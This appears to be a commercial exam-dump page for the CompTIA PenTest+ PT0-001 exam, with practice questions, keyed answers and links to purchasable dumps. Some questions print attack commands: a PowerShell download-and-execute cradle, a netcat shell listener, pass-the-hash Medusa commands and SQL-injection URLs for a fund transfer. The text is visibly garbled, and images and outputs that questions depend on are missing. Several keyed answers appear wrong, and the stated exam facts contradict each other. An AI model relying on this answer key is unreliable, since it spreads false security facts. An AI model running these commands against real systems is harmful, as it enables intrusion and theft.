New 2022 Realistic PT0-001 Dumps Test Engine Exam Questions in here
Updated Official licence for PT0-001 Certified by PT0-001 Dumps PDF
Why Earn the PenTest+ Certification
Different hiring companies usually rely on certifications when choosing the most suitable candidate, and the CompTIA PenTest+ accredited individual will prove to be an asset to any organization. The certificate demonstrates the possession of the required skills and knowledge in cybersecurity. Therefore, having it is a significant advantage to one's career. Some of the job profiles that use this certification as a basis to filter IT security-related job applicants are vulnerability tester, security analyst (II), penetration tester, and many more.
The CompTIA PenTest+ certification will provide a candidate with the right skills to qualify for the mentioned jobs. The abilities such as using modern penetration tools, carrying out data collection procedures by utilizing numerous devices, and performing data and script analysis a highly valuable. Moreover, one proves experience in exploiting wireless, network, apps, and RF-based weaknesses, summarizing physical safety attacks, and preparing a post-exploitation practice. Such proficient penetration testers earn an average compensation of $86k per year, as stated on the PayScale.com website.
NEW QUESTION 87
During an internal network penetration test the tester is able to compromise a Windows system and recover the NTLM hash for a local wrltsrnAdrain account Attempting to recover the plaintext password by cracking the hash has proved to be unsuccessful, and the tester has decided to try a pass-the-hash attack to see if the credentials are reused on other in-scope systems Using the Medusa tool the tester attempts to authenticate to a list of systems, including the originally compromised host, with no success Given the output below:
Which of the following Medusa commands would potentially provide better results?
- A. #medusa -h hosts.txt -U usera.txt -P hashes, txt -M smbnt. -m GROP:LOCAL -O out.txt -m PASS:HASH
- B. #medusa -H hosts.txt -U users, txt -P hashes, txt -M smbnt -m PASS:HASH -o out. txt
- C. #medusa -H hosts.txt -C creds.txt -M mssq1 -m GROUP: DOMAIN -o out.txt
- D. #medusa -H hosts.txt -u WrkStnAdmin -p
aa3b435b51404eeaa3b435b51404ee:4e63c1b137e274dda214154b349fe316 -M smbnt -m GROUP:DOMAIN -o out.txt
Answer: A
NEW QUESTION 88
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
- A. HKEY_CURRENT_CONFIG
- B. HKEY_LOCAL_MACHINE
- C. HKEY_CURRENT_USER
- D. HKEY_CLASSES_ROOT
Answer: C
Explanation:
Explanation/Reference:
Reference: https://www.redcanary.com/blog/windows-registry-attacks-threat-detection/
NEW QUESTION 89
During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?
- A. Locating emergency exits
- B. Preparing a pretext
- C. Tailgating the victim
- D. Shoulder surfing the victim
Answer: B
NEW QUESTION 90
A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?
- A. Send spoofed emails to staff to see if staff will respond with sensitive information.
- B. Obtain staff information by calling the company and using social engineering techniques.
- C. Visit the client and use impersonation to obtain information from staff.
- D. Search the internet for information on staff such as social networking sites.
Answer: D
Explanation:
Explanation
Explanation/Reference: https://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it
NEW QUESTION 91
A security analyst was provided with a detailed penetration report, which was performed against the organization's DMZ environment. It was noted on the report that a finding has a CVSS base score of 10.0.
Which of the following levels of difficulty would be required to exploit this vulnerability?
- A. Impossible; external hosts are hardened to protect against attacks.
- B. Very difficult; perimeter systems are usually behind a firewall.
- C. Trivial; little effort is required to exploit this finding.
- D. Somewhat difficult; would require significant processing power to exploit.
Answer: C
Explanation:
Explanation/Reference: https://nvd.nist.gov/vuln-metrics/cvss
NEW QUESTION 92
After successfully enumerating users on an Active Directory domain controller using enum4linux a penetration tester wants to conduct a password-guessing attack Given the below output:
Which of the following can be used to extract usernames from the above output prior to conducting the attack?
- A. cat enum41inux_output.txt > grep -v user I sed 's/\[//' I sed 's/\]//' 2> usernames.txt
- B. grep user enuza41inux_output.txt I awk '{print $1}' | cut -d[ -f2 I cut -d] -f1 > username.txt
- C. grep -i rid v< enura.41inux_output. txt' | cut -d: -f2 i cut -d] -f1 > usernames. txt
- D. cut -d: -f2 enum41inux_output.txt | awk '{print S2}' I cut -d: -f1 > usernaraes.txt
Answer: B
NEW QUESTION 93
Black box penetration testing strategy provides the tester with:
- A. a network diagram
- B. source code
- C. privileged credentials
- D. a target list
Answer: C
Explanation:
Explanation/Reference:
References: https://www.scnsoft.com/blog/fifty-shades-of-penetration-testing
NEW QUESTION 94
Consider the following PowerShell command:
Powershell.exe
IEX (New-Object Net.Webclient).downloadstring (http:// site/script.ps1"); Invoke-Cmdlet Which of the following BEST describes the actions performed this command?
- A. Execute a remote script
- B. Instantiate an object
- C. Set the execution policy
- D. Run an encoded command
Answer: A
NEW QUESTION 95
A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?
- A. nc -p 4444 /bin/bash
- B. nc -lvp 4444 /bin/bash
- C. nc -vp 4444 /bin/bash
- D. nc -lp 4444 -e /bin/bash
Answer: B
NEW QUESTION 96
A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?
- A. Script kiddie
- B. Advanced persistent threat
- C. Organized crime
- D. Hacktivist
Answer: A
Explanation:
Explanation
Reference https://www.sciencedirect.com/topics/computer-science/disgruntled-employee
NEW QUESTION 97
If a security consultant comes across a password hash that resembles the following:
b117525b345470c29ca3d8ac0b556ba8
Which of the following formats is the correct hash type?
- A. NTLM
- B. NetNTLMv1
- C. SHA-1
- D. Kerberos
Answer: C
NEW QUESTION 98
A penetration tester successfully exploits a Windows host and dumps the hashes Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?
A)
B)
C)
D)
- A. Option C
- B. Option B
- C. Option A
- D. Option D
Answer: D
NEW QUESTION 99
An assessor begins an internal security test of the Windows domain internal. comptia. net.
The assessor is given network access via DHCP, but is not given any network maps or target IP addresses. Which of the following commands can the assessor use to find any likely Windows domain controllers?
A)
B)
C)
D)
- A. Option D
- B. Option C
- C. Option B
- D. Option A
Answer: D
NEW QUESTION 100
Joe, an attacker, intends to transfer funds discreetly from a victim's account to his own. Which of the following URLs can he use to accomplish this attack?
- A. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action- ACHTransfer&senderID=654846¬ify=False&creditaccount='OR 1=1 AND select username from testbank.custinfo where username like 'Joe'−&amount=200
- B. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action- ACHTransfer&senderID=654846¬ify=False&creditaccount='OR 1=1 AND select username from testbank.custinfo where username like 'Joe' &amount=200
- C. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action- ACHTransfer&senderID=654846¬ify=True&creditaccount='AND 1=1 AND select username from testbank.custinfo where username like 'Joe' −&amount=200
- D. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action- ACHTransfer&senderID=654846¬ify=True&creditaccount='OR 1=1 AND select username from testbank.custinfo where username like 'Joe' −&amount=200
Answer: B
NEW QUESTION 101
A penetration tester is connected to a client's local network and wants to passively identify cleartext protocols and potentially sensitive data being communicated across the network.
Which of the following is the BEST approach to take?
- A. Run a network vulnerability scan.
- B. Run an MITM attack.
- C. Run a port scan.
- D. Run a stress test.
Answer: B
NEW QUESTION 102
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.








Answer:
Explanation:
Step 1 - Generate a Certificate Signing Request
Step 2 - Submit CSR to the CA
Step 3 - Install re-issued certificate on the server
Step 4 - Remove Certificate from Server
NEW QUESTION 103
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).
- A. Increase minimum password complexity requirements.
- B. Randomize local administrator credentials for each machine.
- C. Enable full-disk encryption on every workstation.
- D. Apply additional network access control.
- E. Require multifactor authentication for all logins.
- F. Disable remote logons for local administrators.
- G. Segment each host into its own VLAN.
Answer: A,D,E
NEW QUESTION 104
A penetration tester has performed a vulnerability scan of a specific host that contains a valuable database and has identified the following vulnerabilities:
* XSS
* HTTP DELETE method allowed
* SQL injection
* Vulnerable to CSRF
To which of the following should the tester give the HIGHEST priority?
- A. XSS
- B. SQL injection
- C. HTTP DELETE method allowed
- D. Vulnerable to CSRF
Answer: C
NEW QUESTION 105
Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented Each password may be used only once
Answer:
Explanation:
NEW QUESTION 106
An attacker is attempting to gain unauthorized access to a WiR network that uses WPA2-PSK Which of the following attack vectors would the attacker MOST likely use?
- A. Capture a mobile device and crack its encryption
- B. Create a rogue wireless access point
- C. Capture a three-way handshake and crack it
- D. Capture a four-way handshake and crack it
Answer: D
NEW QUESTION 107
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
- A. Destination index register
- B. Index pointer register
- C. Stack base pointer
- D. Stack pointer register
Answer: D
Explanation:
Explanation/Reference:
Reference: http://www.informit.com/articles/article.aspx?p=704311&seqNum=3
NEW QUESTION 108
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:
* Code review
* Updates to firewall setting
- A. Scope creep
- B. Risk acceptance
- C. Post-mortem review
- D. Threat prevention
Answer: D
NEW QUESTION 109
A penetration tester observes that the content security policy header is missing during a web application penetration test.
Which of the following techniques would the penetration tester MOST likely perform?
- A. Directory traversal attack
- B. Remote file inclusion attack
- C. Command injection attack
- D. Clickjacking attack
Answer: A
Explanation:
References: https://geekflare.com/http-header-implementation/
NEW QUESTION 110
A penetration tester is performing a wireless penetration test.
Which of the following are some vulnerabilities that might allow the penetration tester to easily and quickly access a WPA2-protected access point?
- A. Rainbow tables contain all possible password combinations, which can be used to perform a brute-force password attack to retrieve the password, which can then be used to connect to the WPA2-protected access point.
- B. Injection of customized ARP packets can generate many initialization vectors quickly, making it faster to crack the password, which can then be used to connect to the WPA2-protected access point.
- C. Weak implementations of the WEP can allow pin numbers to be guessed quickly, which can then be used to retrieve the password, which can then be used to connect to the WEP-protected access point.
- D. Deauthentication attacks against an access point can allow an opportunity to capture the four-way handshake, which can be used to obtain and crack the encrypted password.
Answer: C
NEW QUESTION 111
Given the following script:
Which of the following BEST describes the purpose of this script?
- A. Keystroke monitoring
- B. Debug message collection
- C. Log collection
- D. Event logging
Answer: A
NEW QUESTION 112
......
What exam features should you explore?
The exam contains 85 questions covering the multiple-choice and performance-based formats. The applicants will have 165 minutes for the completion of the test, and to pass it, you must achieve the score of 750 points on a scale of 100-900. To register for CompTIA PT0-001, the students have to go through the Pearson VUE website to apply for it and take the exam online or at one of the testing centers across the world. The fee is $370 and the test is available in English or Japanese.
What is the duration of the PT0-001 Exam
- Number of Questions: 90
- Passing score: 720
- Format: Multiple choices, multiple answers
- Length of Examination: 90 minutes
Grab latest CompTIA PT0-001 Dumps as PDF Updated: https://www.exams-boost.com/PT0-001-valid-materials.html
Newly Released PT0-001 Dumps for CompTIA PenTest+ Certified: https://drive.google.com/open?id=1XFJkGe6pQnDCIk-WHP-yYxerZz9wYc6S